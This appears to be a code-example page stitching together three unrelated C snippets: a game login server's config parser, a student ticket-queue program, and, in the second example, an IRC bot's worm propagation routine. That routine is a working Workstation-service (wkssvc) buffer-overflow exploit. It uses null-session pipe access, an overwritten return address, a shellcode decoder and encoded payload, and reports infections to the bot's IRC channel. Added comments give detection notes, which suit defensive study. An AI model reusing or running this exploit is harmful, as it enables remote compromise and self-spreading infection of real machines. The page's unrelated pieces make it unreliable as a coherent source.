Beispiel #1
/**
 * Reading main configuration file.
 *
 * The file is parsed line by line as "key: value" pairs. Lines that start
 * with "//" are skipped, as are lines that do not yield both a key (at most
 * 31 characters, up to the first ':') and a value (at most 1023 characters,
 * up to the end of the line). Keys are compared case-insensitively.
 *
 * NOTE(review): this listing is an excerpt; the function body continues past
 * the last line shown here, so cleanup (e.g. closing fp) is not visible.
 *
 * @param cfgName: Name of the configuration (could be fullpath)
 * @param normal: Config read normally when server started
 * @return True: success, False: failure (file not found or not readable)
 */
bool login_config_read(const char* cfgName, bool normal) {
	char line[1024], w1[32], w2[1024];
	FILE* fp = fopen(cfgName, "r");
	if (fp == NULL) {
		ShowError("Configuration file (%s) not found.\n", cfgName);
		return false;
	}
	// A physical line longer than sizeof(line)-1 is returned by fgets in
	// pieces, so its tail is parsed as if it were a separate line.
	while(fgets(line, sizeof(line), fp)) {
		if (line[0] == '/' && line[1] == '/')
			continue;

		// Field widths (31 / 1023) leave room for the terminator in w1 / w2.
		if (sscanf(line, "%31[^:]: %1023[^\r\n]", w1, w2) < 2)
			continue;

		// Config that loaded only when server started, not by reloading config file
		if (normal) {
			if( !strcmpi(w1, "bind_ip") ) {
				login_config.login_ip = host2ip(w2);
				if( login_config.login_ip ) {
					char ip_str[16];
					ShowStatus("Login server binding IP address : %s -> %s\n", w2, ip2str(login_config.login_ip, ip_str));
				}
			}
			else if( !strcmpi(w1, "login_port") )
				// atoi reports no errors: a non-numeric value becomes 0 and an
				// out-of-range value is silently truncated by the uint16 cast.
				login_config.login_port = (uint16)atoi(w2);
			else if(!strcmpi(w1, "console"))
				login_config.console = (bool)config_switch(w2);
		}

		if(!strcmpi(w1,"timestamp_format"))
			// NOTE(review): the bound is a literal 20, not the size of the
			// destination as in the other copies below; confirm that
			// timestamp_format holds at least 20 bytes.
			safestrncpy(timestamp_format, w2, 20);
		else if(strcmpi(w1,"db_path")==0)
			safestrncpy(db_path, w2, ARRAYLENGTH(db_path));
		else if(!strcmpi(w1,"stdout_with_ansisequence"))
			stdout_with_ansisequence = config_switch(w2);
		else if(!strcmpi(w1,"console_silent")) {
			msg_silent = atoi(w2);
			if( msg_silent ) /* only bother if we actually have this enabled */
				ShowInfo("Console Silent Setting: %d\n", atoi(w2));
		}
		else if (strcmpi(w1, "console_msg_log") == 0)
			console_msg_log = atoi(w2);
		else if  (strcmpi(w1, "console_log_filepath") == 0)
			safestrncpy(console_log_filepath, w2, sizeof(console_log_filepath));
		else if(!strcmpi(w1, "log_login"))
			login_config.log_login = (bool)config_switch(w2);
		else if(!strcmpi(w1, "new_account"))
			login_config.new_account_flag = (bool)config_switch(w2);
		else if(!strcmpi(w1, "new_acc_length_limit"))
			login_config.new_acc_length_limit = (bool)config_switch(w2);
		else if(!strcmpi(w1, "start_limited_time"))
			login_config.start_limited_time = atoi(w2);
		else if(!strcmpi(w1, "use_MD5_passwords"))
			// NOTE(review): judging by the key name this selects MD5 for
			// stored passwords; a fast unsalted digest is a weak choice for
			// password storage. Confirm how the flag is consumed.
			login_config.use_md5_passwds = (bool)config_switch(w2);
		else if(!strcmpi(w1, "group_id_to_connect"))
			login_config.group_id_to_connect = atoi(w2);
		else if(!strcmpi(w1, "min_group_id_to_connect"))
			login_config.min_group_id_to_connect = atoi(w2);
		else if(!strcmpi(w1, "date_format"))
			safestrncpy(login_config.date_format, w2, sizeof(login_config.date_format));
		else if(!strcmpi(w1, "allowed_regs")) //account flood protection system
			login_config.allowed_regs = atoi(w2);
		else if(!strcmpi(w1, "time_allowed"))
			login_config.time_allowed = atoi(w2);
		else if(!strcmpi(w1, "use_dnsbl"))
			login_config.use_dnsbl = (bool)config_switch(w2);
		else if(!strcmpi(w1, "dnsbl_servers"))
			safestrncpy(login_config.dnsbl_servs, w2, sizeof(login_config.dnsbl_servs));
		else if(!strcmpi(w1, "ipban_cleanup_interval"))
			// A negative value from atoi wraps to a large unsigned interval.
			login_config.ipban_cleanup_interval = (unsigned int)atoi(w2);
		else if(!strcmpi(w1, "ip_sync_interval"))
			login_config.ip_sync_interval = (unsigned int)1000*60*atoi(w2); //w2 comes in minutes.
		else if(!strcmpi(w1, "client_hash_check"))
			login_config.client_hash_check = config_switch(w2);
		else if(!strcmpi(w1, "client_hash")) {
			// Value format: "<group>, <32 hex digits>" or "<group>, disabled".
			int group = 0;
			char md5[33];

			// %32s stores at most 32 characters plus the terminator in md5[33].
			if (sscanf(w2, "%3d, %32s", &group, md5) == 2) {
				struct client_hash_node *nnode;
				// Allocation failure handling depends on the CREATE macro,
				// which is defined outside this excerpt.
				CREATE(nnode, struct client_hash_node, 1);
				if (strcmpi(md5, "disabled") == 0) {
					nnode->hash[0] = '\0';
				} else {
					int i;
					// NOTE(review): the loop always consumes 32 characters. If
					// the configured value is shorter, bytes of md5 past its
					// terminator (never initialised) are read, and when a pair
					// is not valid hex the unchecked sscanf leaves `byte`
					// uninitialised. Validating length and hex digits first
					// would avoid storing an unintended hash.
					for (i = 0; i < 32; i += 2) {
						char buf[3];
						unsigned int byte;

						memcpy(buf, &md5[i], 2);
						buf[2] = 0;

						sscanf(buf, "%2x", &byte);
						// Writes hash[0..15]; presumably hash has room for 16
						// bytes (its declaration is not shown here).
						nnode->hash[i / 2] = (uint8)(byte & 0xFF);
					}
				}
				// New entries are pushed at the head of the list.
				nnode->group_id = group;
				nnode->next = login_config.client_hash_nodes;
				login_config.client_hash_nodes = nnode;
			}
		} else if(strcmpi(w1, "chars_per_account") == 0) { //maxchars per account [Sirius]
Beispiel #2
// ScriptGod_WKSSVC: propagation routine of an IRC-controlled bot (at the end
// it reports to exinfo.chan through irc_privmsg, writes a log line and bumps
// exploit[...].stats). It writes one crafted DCE/RPC request to the
// Workstation-service named pipe (\\<ip>\pipe\wkssvc) of the host in
// exinfo.ip, and only when FpHost() fingerprints that host as OS_WINXP.
//
// Parameters:
//   nTargetID - index into Targets[] (declared elsewhere in the file).
//   exinfo    - passed by value; the fields read here are ip, sock, chan,
//               notice and exploit.
// Returns FALSE when the fingerprint is not OS_WINXP, no payload buffer is
// obtained, the pipe cannot be opened, allocation fails or a write fails.
// Returns TRUE once the request has been written. The pipe is opened with
// GENERIC_WRITE only and no reply is read, so TRUE means "sent", not that
// the remote host was affected.
//
// Defender notes (what this routine looks like from the target side):
//   - a connection to \\<ip>\ipc$ with empty user name and password
//     (a null session);
//   - an open of the wkssvc pipe, an RPC bind, then a single request with
//     opnum 27 or 25;
//   - a string argument in that request that is far longer than any
//     legitimate computer name (built from a 3500-byte buffer of filler).
// The routine gives up as soon as the pipe cannot be opened, so keeping SMB
// unreachable from untrusted peers and restricting anonymous named-pipe
// access are the relevant network-side controls; the service patch level is
// the actual fix. NOTE(review): the advisory for the underlying flaw is not
// named on this page.
BOOL ScriptGod_WKSSVC( unsigned long nTargetID, EXINFO exinfo )
{
	int TargetOS;
	char szShellBuf[ 512 ];
	int iShellSize;

	// =============================
	char* pszTarget;
	// ---
	char szNetbiosTarget[ 8192 ];
	wchar_t wszNetbiosTarget[ 8192 ];
	unsigned char szShellcodeEncoded[ ( sizeof( szShellBuf ) * 2 ) + 1 ];
	unsigned char szExploitsData[ 3500 ];
	unsigned long nExploitsDataPos;
	wchar_t wszExploitsData[ sizeof( szExploitsData ) ];
	// ---
	char szIPC[ 8192 ];
	NETRESOURCE NetSource;
	// ---
	char szPipe[ 8192 ];
	HANDLE hPipe;
	// ---
	RPC_ReqBind BindPacket;
	unsigned long nBytesWritten;
	RPC_ReqNorm ReqNormalHeader;
	unsigned long nPacketSize;
	unsigned char* pPacket;
	unsigned long nPacketPos;
	// ============================

	// check if xp
	// (the remote host is fingerprinted over RPC before anything is sent;
	// every other OS result ends the routine here)
	TargetOS = FpHost( exinfo.ip, FP_RPC );
	if( TargetOS != OS_WINXP )
		return FALSE;

	// parameters
	pszTarget = exinfo.ip;

	// get shellcode
	// (`filename` is not a parameter or local; it comes from file scope)
	iShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename );
	if( !iShellSize )
		return FALSE;

	// generate exploits buffer
	// ========================
	memset( szShellcodeEncoded, 0, sizeof( szShellcodeEncoded ) );
	memset( szExploitsData, 0, sizeof( szExploitsData ) );
	memset( wszExploitsData, 0, sizeof( wszExploitsData ) );

	// fill with NOPs (using inc ecx instead of NOP, 0-terminated-string)
	memset( szExploitsData, 'A', sizeof( szExploitsData ) - 1 );

	// new EIP
	*(unsigned long*)( &szExploitsData[ Targets[ nTargetID ].nNewEIP_BufferOffset ] ) = Targets[ nTargetID ].nNewEIP;

	// some NOPs
	nExploitsDataPos = 2300;

	// add stack
	memcpy( &szExploitsData[ nExploitsDataPos ], szStack, sizeof( szStack ) - 1 );
	nExploitsDataPos += sizeof( szStack ) - 1;

	// add decoder
	memcpy( &szExploitsData[ nExploitsDataPos ], szDecoder, sizeof( szDecoder ) - 1 );
	nExploitsDataPos += sizeof( szDecoder ) - 1;

	// add shellcode
	// - bind port
	// - encode
	Encode( (unsigned char*)szShellBuf, iShellSize, szShellcodeEncoded );
	// - add
	memcpy( &szExploitsData[ nExploitsDataPos ], szShellcodeEncoded, strlen( (char*)szShellcodeEncoded ) );
	nExploitsDataPos += strlen( (char*)szShellcodeEncoded );
	// - 0 terminaten for decoder
	szExploitsData[ nExploitsDataPos ] = 0;
	nExploitsDataPos += 1;

	// convert to UNICODE
	// ==================
	for( int n = 0; n < sizeof( szExploitsData ); n++ )
		wszExploitsData[ n ] = szExploitsData[ n ];
	//MultiByteToWideChar( CP_ACP, 0, (char*)szExploitsData, -1, wszExploitsData, sizeof( wszExploitsData ) / sizeof( wchar_t ) );
	snprintf( szNetbiosTarget, sizeof( szNetbiosTarget ), "\\\\%s", pszTarget );
	mbstowcs( wszNetbiosTarget, szNetbiosTarget, sizeof( wszNetbiosTarget ) / sizeof( wchar_t ) );

	// create NULL session
	// ===================
	// Detection: this is an IPC$ connection with empty user name and empty
	// password. The result of the call is not checked.
	if( strcmpi( pszTarget, "." ) )
	{
		snprintf( szIPC, sizeof( szIPC ), "\\\\%s\\ipc$", pszTarget );
		memset( &NetSource, 0 ,sizeof( NetSource ) );
		NetSource.lpRemoteName = szIPC;
		fWNetAddConnection2( &NetSource, "", "", 0 );
	}
	// ===================

	// connect to pipe
	// ===============
	// The pipe is opened write-only, so nothing the service answers is read.
	snprintf( szPipe, sizeof( szPipe ), "\\\\%s\\pipe\\wkssvc", pszTarget );
	hPipe = CreateFile( szPipe, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL );
	if( hPipe == INVALID_HANDLE_VALUE )
	{
		fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
		return FALSE;
	}
	// ===============

	// bind packet
	// ===========
	// Detection: a bind with one context element; the two 16-byte values
	// copied below are the interface and transfer-syntax identifiers.
	memset( &BindPacket, 0, sizeof( BindPacket ) );
	BindPacket.NormalHeader.versionmaj		= 5;
	BindPacket.NormalHeader.versionmin		= 0;
	BindPacket.NormalHeader.type			= 11;	// bind
	BindPacket.NormalHeader.flags			= 3;	// first + last fragment
	BindPacket.NormalHeader.representation	= 0x00000010; // little endian
	BindPacket.NormalHeader.fraglength		= sizeof( BindPacket );
	BindPacket.NormalHeader.authlength		= 0;
	BindPacket.NormalHeader.callid			= 1;
	BindPacket.maxtsize						= 4280;
	BindPacket.maxrsize						= 4280;
	BindPacket.assocgid						= 0;
	BindPacket.numelements					= 1;
	BindPacket.contextid					= 0;
	BindPacket.numsyntaxes					= 1;
	BindPacket.Interface1.version			= 1;
	memcpy( BindPacket.Interface1.byte, "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a", 16 );
	BindPacket.Interface2.version			= 2;
	memcpy( BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16 );

	// send
	if( !WriteFile( hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL ) )
	{
		CloseHandle( hPipe );
		fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
		return FALSE;
	}
	// ===========

	// request
	// =======
	// generate packet
	// ---------------

	// calc packet size
	nPacketSize = 0;
	nPacketSize += sizeof( szWKSSVCUnknown1 ) - 1;
	nPacketSize += sizeof( UNISTR2 );
	nPacketSize += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
	while( nPacketSize % 4 )
		nPacketSize++;
	if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
		nPacketSize += sizeof( szWKSSVCUnknown2 ) - 1;
	nPacketSize += sizeof( UNISTR2 );
	nPacketSize += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
	while( nPacketSize % 4 )
		nPacketSize++;
	nPacketSize += 8; // szWSSKVCUnknown3
	if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
		nPacketSize += 4; // NetAddAlternateComputerName = reserved
	else
		nPacketSize += 2; // NetValidateName = NameType

	// alloc packet
	pPacket = (unsigned char*)malloc( nPacketSize );
	if( !pPacket )
	{
		CloseHandle( hPipe );
		fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
		return FALSE;
	}
	memset( pPacket, 0, nPacketSize );

	// build packet
	nPacketPos = 0;

	// - szWKSSVCUnknown1
	memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown1, sizeof( szWKSSVCUnknown1 ) - 1 );
	nPacketPos += sizeof( szWKSSVCUnknown1 ) - 1;

	// - wszNetbiosTarget
	( (UNISTR2*)&pPacket[ nPacketPos ] )->length	= wcslen( wszNetbiosTarget ) + 1;
	( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown	= 0;
	( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength	= ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
	nPacketPos += sizeof( UNISTR2 );

	wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszNetbiosTarget );
	nPacketPos += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );

	// - align
	while( nPacketPos % 4 )
		nPacketPos++;

	// - szWKSSVCUnknown2
	if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
	{
		memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown2, sizeof( szWKSSVCUnknown2 ) - 1 );
		nPacketPos += sizeof( szWKSSVCUnknown2 ) - 1;
	}

	// - wszExploitsData
	// Detection: the declared length of this string argument is the number
	// of wide characters in the oversized buffer plus one.
	( (UNISTR2*)&pPacket[ nPacketPos ] )->length	= wcslen( wszExploitsData ) + 1;
	( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown	= 0;
	( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength	= ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
	nPacketPos += sizeof( UNISTR2 );

	wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszExploitsData );
	nPacketPos += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );

	// - align
	while( nPacketPos % 4 )
		nPacketPos++;

	// - szWSSKVCUnknown3 (only eigth 0x00s)
	memset( &pPacket[ nPacketPos ], 0, 8 );
	nPacketPos += 8;

	if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
	{
		// NetAddAlternateComputerName = 0
		*(DWORD*)&pPacket[ nPacketPos ] = 0;
		nPacketPos += sizeof( DWORD );
	}
	else
	{
		// NetValidateName = NetSetupMachine
		*(unsigned short*)&pPacket[ nPacketPos ] = 1;
		nPacketPos += 2;
	}

	// header
	memset( &ReqNormalHeader, 0, sizeof( ReqNormalHeader ) );
	ReqNormalHeader.NormalHeader.versionmaj		= 5;
	ReqNormalHeader.NormalHeader.versionmin		= 0;
	ReqNormalHeader.NormalHeader.type			= 0;	// request
	ReqNormalHeader.NormalHeader.flags			= 3;	// first + last fragment
	ReqNormalHeader.NormalHeader.representation	= 0x00000010; // little endian
	ReqNormalHeader.NormalHeader.authlength		= 0;
	ReqNormalHeader.NormalHeader.callid			= 1;
	ReqNormalHeader.prescontext					= 0;
	if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
		ReqNormalHeader.opnum					= 27;	// NetrAddAlternateComputerName
	else
		ReqNormalHeader.opnum					= 25;	// NetrValidateName2
	// send
	if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nPacketSize, 4280, true ) )
	{
		CloseHandle( hPipe );
		free( pPacket );
		fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
		return FALSE;
	}
	// =======

	// clean up
	// =================;
	CloseHandle( hPipe );
	free( pPacket );
	fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );

	// The attempt is announced on the controlling IRC channel and written to
	// the bot's own log; the per-exploit counter counts attempts sent.
	char buffer[ IRCLINE ];
	_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
	irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
	addlog(buffer);
	exploit[exinfo.exploit].stats++;

	return TRUE;
}
Beispiel #3
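/*
 * Read one line from stdin into buf (capacity `size` bytes, terminator
 * included). The trailing newline is stripped; input that does not fit is
 * discarded instead of being written past the buffer, which is what gets()
 * would have done. Returns 1 when a line was read, 0 on end-of-file or read
 * error (buf is then set to the empty string).
 */
static int read_line(char *buf, size_t size)
{
    size_t len;
    int c;

    if (size == 0)
        return 0;
    if (fgets(buf, (int)size, stdin) == NULL) {
        buf[0] = '\0';
        return 0;
    }
    len = strcspn(buf, "\n");
    if (buf[len] == '\n') {
        buf[len] = '\0';
    } else {
        /* line was longer than the buffer: drop the remainder */
        while ((c = getchar()) != '\n' && c != EOF) {
        }
    }
    return 1;
}

/*
 * Menu loop of the concert ticket queue program. Two queues (festival and
 * tribune) are filled from user input, shown, and served one entry at a
 * time while the income totals are accumulated. The loop ends when the user
 * enters 0 or input reaches end-of-file.
 *
 * Changes against the original:
 *  - gets() is replaced by bounded reads (read_line), so an over-long name,
 *    phone number or ticket type can no longer overflow the Data fields;
 *  - NewVal.jenis_tiket is initialised before it is first compared (it was
 *    read uninitialised on the first pass through menu 1);
 *  - the result of scanf() is checked, so non-numeric input no longer
 *    leaves `menu` unset or loops forever on the same bad token;
 *  - fflush(stdin), which is undefined in standard C, is replaced by
 *    discarding the rest of the input line.
 *
 * NOTE(review): `void main()` is kept so the signature is unchanged;
 * standard C expects `int main(void)`.
 */
void main() {
    /* Queues and the record used to collect input.
     * sizeof on the Data fields below assumes nama, no_hp and jenis_tiket
     * are char arrays (the original passed them to gets() on an otherwise
     * uninitialised struct, so they cannot be bare pointers) - confirm
     * against the declaration of Data. */
    Queue QFest,QTribun;
    Data NewVal;
    double TotalJumlah=0,TotalT=0,TotalF=0;
    int menu = -1;
    int rc;
    int c;

    /* Initialise the queues */
    CreateEmpty(&QFest);
    CreateEmpty(&QTribun);

    /* Same "no ticket type chosen" marker that is restored after each entry */
    strcpy(NewVal.jenis_tiket,"-");

    /* Menu loop */
    do {
        system("CLS");
        printf("===== KONSER TONG TONG BAND =====\n");
        printf("1. Masukan Antrian \n");
        printf("2. Tampil Antrian Tribun \n");
        printf("3. Tampil Antrian Festival \n");
        printf("4. Transaksi Antrian Tribun \n");
        printf("5. Transaksi Antrian Festival \n");
        printf("6. Jumlah Pendapatan \n");
        printf("7. TUGAS - Jumlah Pendapatan \n");
        printf("================================= \n");
        printf(" >> Masukan Menu : ");

        rc = scanf("%d",&menu);
        if (rc == EOF)
            break;              /* no more input: leave the program */
        if (rc != 1)
            menu = -1;          /* not a number: matches no menu entry */
        /* drop the rest of the line, including the newline scanf leaves */
        while ((c = getchar()) != '\n' && c != EOF) {
        }

        switch(menu) {
        case 1 : /* Enqueue a new customer */
            printf(" Nama                         : ");
            read_line(NewVal.nama, sizeof NewVal.nama);
            printf(" No Hp                        : ");
            read_line(NewVal.no_hp, sizeof NewVal.no_hp);

            /* Ask for the ticket type until it is one of the two known values */
            while(strcmpi(NewVal.jenis_tiket,"festival")!=0 && strcmpi(NewVal.jenis_tiket,"tribun")!=0) {
                printf(" Jenis Tiket(festival/tribun) : ");
                if (!read_line(NewVal.jenis_tiket, sizeof NewVal.jenis_tiket))
                    break;      /* end of input: stop asking */
            }
            if(strcmpi(NewVal.jenis_tiket,"festival")==0) {
                /* Refuse when the festival queue is full */
                if (isFull(QFest)) {
                    printf("\n antrian penuh . . .");
                    strcpy(NewVal.jenis_tiket,"-");
                    break;
                }
                /* Assign the next ticket number */
                NewVal.no_antrian=AutoID(&QFest);
                printf(" Nomor Tiket                  : %d \n",NewVal.no_antrian);
                /* Enqueue */
                Add(&QFest,NewVal);

            }
            if(strcmpi(NewVal.jenis_tiket,"tribun")==0) {

                /* Refuse when the tribune queue is full */
                if (isFull(QTribun)) {
                    printf("\n antrian penuh . . .");
                    strcpy(NewVal.jenis_tiket,"-");
                    break;
                }
                /* Assign the next ticket number */
                NewVal.no_antrian=AutoID(&QTribun);
                printf(" Nomor Tiket                  : %d \n",NewVal.no_antrian);
                /* Enqueue */
                Add(&QTribun,NewVal);
            }


            /* Reset the ticket type so the next entry is asked again */
            strcpy(NewVal.jenis_tiket,"-");
            break;
        case 2 :
            /* Nothing to show for an empty queue */
            if (isEmpty(&QTribun)) {
                printf("\n antrian kosong . . .");
                break;
            }
            /* Show the tribune queue */
            ShowQueue(QTribun);
            break;
        case 3 :
            /* Nothing to show for an empty queue */
            if (isEmpty(&QFest)) {
                printf("\n antrian kosong . . .");
                break;
            }
            /* Show the festival queue */
            ShowQueue(QFest);
            break;
        case 4 :
            if (isEmpty(&QTribun)) {
                printf("\n antrian kosong . . .");
                break;
            }
            /* Print the transaction, add it to the totals, then dequeue */
            printf("\n ====== Transaksi Tribun====== \n");
            JumlahPendapatan(QTribun,&TotalJumlah,&TotalT,&TotalF);
            Delete(&QTribun);


            break;
        case 5 :
            if (isEmpty(&QFest)) {
                printf("\n antrian kosong . . .");
                break;
            }
            /* Print the transaction, add it to the totals, then dequeue */
            printf("\n ====== Transaksi Festival====== \n");
            JumlahPendapatan(QFest,&TotalJumlah,&TotalT,&TotalF);
            Delete(&QFest);

            break;
        case 6 :
            printf("\n Total Pendapatan          = %lf",TotalJumlah);
            break;
        case 7 :
            printf("\n Total Pendapatan Tribun   = %lf",TotalT);
            printf("\n Total Pendapatan Festival = %lf",TotalF);
            printf("\n---------------------------------------- ++");
            printf("\n Total Pendapatan          = %lf",TotalT+TotalF);
            break;
        case 8 : /* debug view of the tribune queue indices (not in the menu) */
            printf(" Head %d \n",QTribun.head);
            printf(" Tail %d \n",QTribun.tail);
            break;

        }
        /* wait for a key press before the screen is cleared again */
        getch();
    } while(menu!=0);

}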